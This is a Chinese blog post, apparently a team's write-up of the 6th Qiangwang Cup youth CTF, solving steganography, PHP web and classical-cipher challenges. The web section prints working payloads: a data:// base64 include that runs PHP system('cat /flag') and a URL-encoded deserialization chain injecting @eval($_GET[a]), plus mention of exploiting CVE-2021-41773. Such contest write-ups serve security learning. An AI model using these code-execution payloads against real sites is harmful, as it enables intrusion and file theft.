第六届“强网杯”青少年专项赛 writewp by 楠辞姐姐后援团

已于 2022-09-11 12:37:55 修改
阅读量2.4k 收藏 5
点赞数 7
分类专栏: CTF 文章标签: php 开发语言
于 2022-09-11 11:54:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JEWSWS/article/details/126803937
版权

楠辞姐姐后援团战队WRITEUP

前言

这次比赛难度很大,Crypto部分也全都是猜谜语类型的题目,没啥游戏体验,不过好在排名在前30.本篇WP为团队WP,团队成员为:树木,AcexZe,Lenyi

战队信息

战队名称:楠辞姐姐后援团

战队排名:24

解题情况

 

解题过程

Misc

misc1

先将得到的base64转文件得到

可以看出来将偶数位和奇数位互换可以得到一个png图片

f1 = open('chuyinweilai.png.png', 'rb').read()
f2 = open('1.png', 'ab+')
for i in range(0, len(f1), 2):
    f2.write(f1[i:i+2][::-1])
f2.close()

得到

在最低有效位通道可以发现不太对劲,结合密钥可以想到加密lsb

根据描述百度万能和弦得到4536251

使用cloacked-pixel解密

得到

flag{5cc0aa21208b517dbd0bde650247237f}

misc3

在附件尾部找到

可以看到有一个密码和zip数据,foremost分离出zip

解压得到

结合图片内容和密钥以及misc1的思路,直接用cloacked-pixel跑

得到

flag{2e55f884-ef01-4654-87b1-cc3111800085}

Web

web1

看一下题目描述,发现存在CVE-2021-41773,我们直接百度一手,搜到了一个github工具

使用该工具成功获取flag

flag{f59a396c-a2b7-4433-961d-5b979fccfe2e}

web2

进入容器看一手源码

看到最底下存在一个base64加密过的字符串,直接base64解密(不止一层,套娃解就好)

解出来了个cream.php,我们访问

得到了该题目的源码,审计一下

Fopen是r+函数,所以文件或url必须同时具有读写能力,经测试后发现伪协议可以正常使用,file参数解决,而content内容就是include的参数,所以我们可以直接使用data加base64绕过,下面放出payload

/cream.php?file=data://,&content=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgL2ZsYWciKTs/Pg==

成功获取flag

flag{27311418-850e-4d85-8ea2-ee88685e1274}

web3

首先利用dirsearch扫描目录得到www.zip和dome.php

发现www.zip中有demo.php的源码

根据源码写出exp:

$res = new Sliver;

$res->secret = new Range;

$res->secret->link = new Water;

$res->secret->link->waterfall = new Circle;

echo urlencode(serialize($a));

利用/绕过

Poc:

demo.php

?data=O%3A6%3A%22Sliver%22%3A2%3A%7Bs%3A6%3A%22secret%22%3BO%3A5%3A%22Range%22%3A2%3A%7Bs%3A5%3A%22horis%22%3BN%3Bs%3A4%3A%22link%22%3BO%3A5%3A%22Water%22%3A1%3A%7Bs%3A9%3A%22waterfall%22%3BO%3A6%3A%22Circle%22%3A2%3A%7Bs%3A6%3A%22daemon%22%3BN%3Bs%3A7%3A%22%00%2A%00dash%22%3Bs%3A16%3A%22%40eval%28%24_GET%5Ba%5D%29%3B%22%3B%7D%7D%7Ds%3A5%3A%22resty%22%3BN%3B%7D&a=system("cat /flag");

取得flag

flag{d5c46251-1f3f-4531-a912-cb66c1a6a1e6}

Pwn

一道题都不会捏qwq

Reverse

一道题都不会捏qwq

Crypto

crypto1

拿到一个AB和空格的文档

根据经验,认为符合Morse,将A改为-后将B改为.

使用CyberChef解一下Morse

看到这样的密文,结合简介,想到单表替换密码,使用

其中有一个FLAG IS,将后面的内容复制并转为小写加上flag{},得到flag

flag{1d817f23-4e20-9405-bf6d-e83d055316d6}

crypto2

使用千千秀字的栅栏解密栅栏32得到

使用CyberCher的“ROT47 Brute Force”可以看到在rot32处可以看到flag{,rot31处可以看到uuid格式

再将rot31的数字部分与rot32的非字母部分对应位置替换

Amount = 31: ek`fz7914c2bd-880b-40b0-8167-2e77e3101a44|

Amount = 32: flag{8:25d3ce.991c.51c1.9278.3f88f4212b55}

得到flag

flag{7914d2ce-880c-40c0-8167-2f77f3101b44}

树木有点绿
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
Z87后援团上阵 全系列Intel 8系芯片组简介.pdf
07-26
Z87后援团上阵 全系列Intel 8系芯片组简介.pdf
2021强网杯青少年专项-科普 WP
Moxin1044的博客
10-11 2738
试卷时间:2021-09-2509:00:00-2021-09-3017:00:00 试卷说明:本次考试共设置30道考题,单选题3分/道,多选题4分/道,满分100分。请在考试规定时间内进行答题,如未作答将自动提交且不会记录分数。 一、单项选择题 1、以下做法错误的是?() A、进出办公场所及机房需进行登记、记录 B、办公及机房出入无需专人值守并陪同,自己去 C、重要区域配备电子门禁系统 D、办公区域及机房配备监控系统及防盗报警系统 您的答案:B标准答案:B 2、给系...
第六届强网杯”全国网络安全挑战-青少年专项
热门推荐
Moxin1044的博客
09-06 1万+
试卷说明:本次考试共设置30道考题,单选题3分/道,多选题4分/道,满分100分。16、若两台主机在同一子网中,则两台主机的IP地址分别与它们的子网掩码相“与”的结果一定是?10、若两台主机在同一子网中,则两台主机的IP地址分别与它们的子网掩码相“与”的结果一定是?14、如果数据包是给本网广播的,那么该数据包的目的IP地址应该是()。13、如果数据包是给本网广播的,那么该数据包的目的IP地址应该是()。11、如果数据包是给本网广播的,那么该数据包的目的IP地址应该是()。
隐蔽像素(Cloaked Pixel):一种新型的隐私保护技术
gitblog_00059的博客
04-16 375
隐蔽像素(Cloaked Pixel):一种新型的隐私保护技术 项目地址:https://gitcode.com/livz/cloacked-pixel 在数字时代,隐私保护成为了每个人关注的重要问题。Cloaked Pixel 是一个创新的项目,它提供了一种新的方法来隐藏个人数据,让互联网用户的隐私更加安全。 项目简介 Cloaked Pixel 是一种加密技术,它的核心思想是将像素级别的图像...
强网杯青少年部分writeup
CSDNzr97的博客
09-18 536
简单算法 flag="" def encode(a): s=[] k=0 for i in a: k=k+1 s.append((ord(i)^86)+k) return s print encode(flag) #[49, 60, 58, 53, 50, 107, 117, 63, 57, 107, 63, 109, 66, 137, 65, 119, 118, 128, 142, 118, 117, 118, 123, 147, 77,
第四届“强网杯青少年专项部分writeup
Dream的博客
09-07 3034
第四届“强网杯”全国网络安全挑战青少年专项选拔 加减乘除 ida 反编译,发现输入 name 的地方存在变量覆盖 继续分析 (a) passcode = 3 (b) passcode += 4 © passcode *= 7 (d) passcode /= 5 passcode 初始值为 0,通过 a,b,c,d 进行运算,但不能大于 66,最后结果等于 66 就可以往下执行 ,下面有个 if ( dword_40A0 )语句,需要 dword_40A0 为1,即可获取 shell,前面发现了 nam
强网杯2021 qwb misc WP 5题
mumuzi的博客
06-16 2643
BlueTeaming、ISO1995、CipherMan、ExtremelySlow、EzTime 本来是说昨天发的,忘了…… 然后取证题,比较偏向爆破出的flag;如果是想知道原理等可以去看看空白师傅的WP:https://mp.weixin.qq.com/s/ItaIgLxcXCjvAhyyP3On9Q BlueTeaming 下载解压,得到一个无后缀,winhex查看是7z文件头,添加.7z,解压 得到一个5个G的memory.dmp文件 是一个内存镜像,常见的内存镜像文件有raw、vmem、dmp
PHPWind 失恋后援会模板
08-23
INFORMIX—SQL(ESQL/C)数据库后援维护中的问题及处理方法.pdf
01-03
INFORMIX—SQL(ESQL/C)数据库后援维护中的问题及处理方法.pdf
寿险公司的后援作业系统及流程.pptx
11-23
寿险公司的后援作业系统及流程.pptx
2017第二届广东省强网杯线上misc-Bubble
ChanCherry的博客
02-21 325
下载文件下来,解压得到一个flag.enc,用winHex看了一下,得到一串字符 xinik-samak-luvag-hutaf-fysil-notok-mepek-vanyh-zipef-hilok-detok-damif-cusol-fezyx 看题目bubble,想到会不会是什么bubble加密的。百度了一下,还真的有Bubble Babble Encoding,借鉴了大佬的wp。 Bub...
2023强网杯wp-强网先锋
若谷的博客
12-19 885
2023强网杯
2023年第七届强网杯 WP
渗透测试研究中心
12-22 1965
最坏情况下,前5次全输,需要87步即可达到260分,即第92轮时,因此可以通过本题。利用SQL注入修改data数据的值,本题data是数组,且会插入数据库,最终的payload需要改一下让前后闭合,且TP5,在网上找一个链子的EXP改一下。当然,前一题的SQL注入点依然存在,不过依然需要鉴权进入后台,这意味着,只需要我们能进入后台,就能通过load_file的方式读取flag。简单来说,就是能set任意的值,例如下方的payload,就能注入一个snowwolf的键,且值为wolf,4代表数据长度。
2023年第七届强网杯部分WP
qq_65165505的博客
12-18 2681
在这个网站直接记载了2的27次方的阶乘的每一位数字之和对4495662081取个sha256即可。
2022强网杯CTF---强网先锋 ASR wp
3tefanie丶zhou的博客
07-31 1670
【有些不愿开口与人说的委屈,来自得不到身边人的回应,种种期许、憧憬、愿望之心声,在心中如擂鼓,响彻自己天地间。心外却哑然,永远寂静无声,这就像一个人把嗓子喊哑了,身边还是无人听见,这个人就会越来越不喜欢说话,一直沉默下去,直到变成一个哑巴。】
如何同步管理1000个设备的VLAN数据?
weixin_68261415的博客
05-15 732
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
FebHost:为什么企业需要注册保加利亚.BG域名?
最新发布
05-16 372
品牌本土化战略的实施同样离不开.BG域名的助力。拥有.BG域名的企业可以显著提高其在来自保加利亚的搜索请求中的可见度和排名,吸引更多的目标访问者,提升用户参与度。在当今全球化的商业环境中,对于与保加利亚市场息息相关的企业而言,选择合适的域名至关重要。面对日益饱和的通用顶级域名市场,.BG提供了一个具有区域特色的替代选择,帮助企业在保加利亚市场中树立一个鲜明且难忘的网络形象。综上所述,对于志在保加利亚市场塑造坚实网络地位的企业、组织或个人而言,.BG域名是一个明智且具有战略意义的选择,值得业界关注和利用。
春秋云境CVE-2022-25487
2303_76653367的博客
05-15 305
Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。
等保测评实体分享three
ddcajdkdl的博客
05-16 922
它除了检测自身的主机以外,根本不检测网络上的情况,而且对入侵行为分析的工作量将随着主机数量的增加而增加,因此全面部署主机入侵检测系统代价比较大,企业很难将所有主机用主机入侵检测系统保护,只能选择部分主机进行保护,那些未安装主机入侵检测系统的机器将成为保护的盲点,入侵者可利用这些机器达到攻击的目标。NIDS一般部署在比较重要的网段内,它不需要改变服务器等主机的配置,由于它不会在业务系统的主机中安装额外的软件,从而不会影响这些机器的CPU、I/O与磁盘等资源的使用,不会影响业务系统的性能。
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议题,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课题和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专题演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从中获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值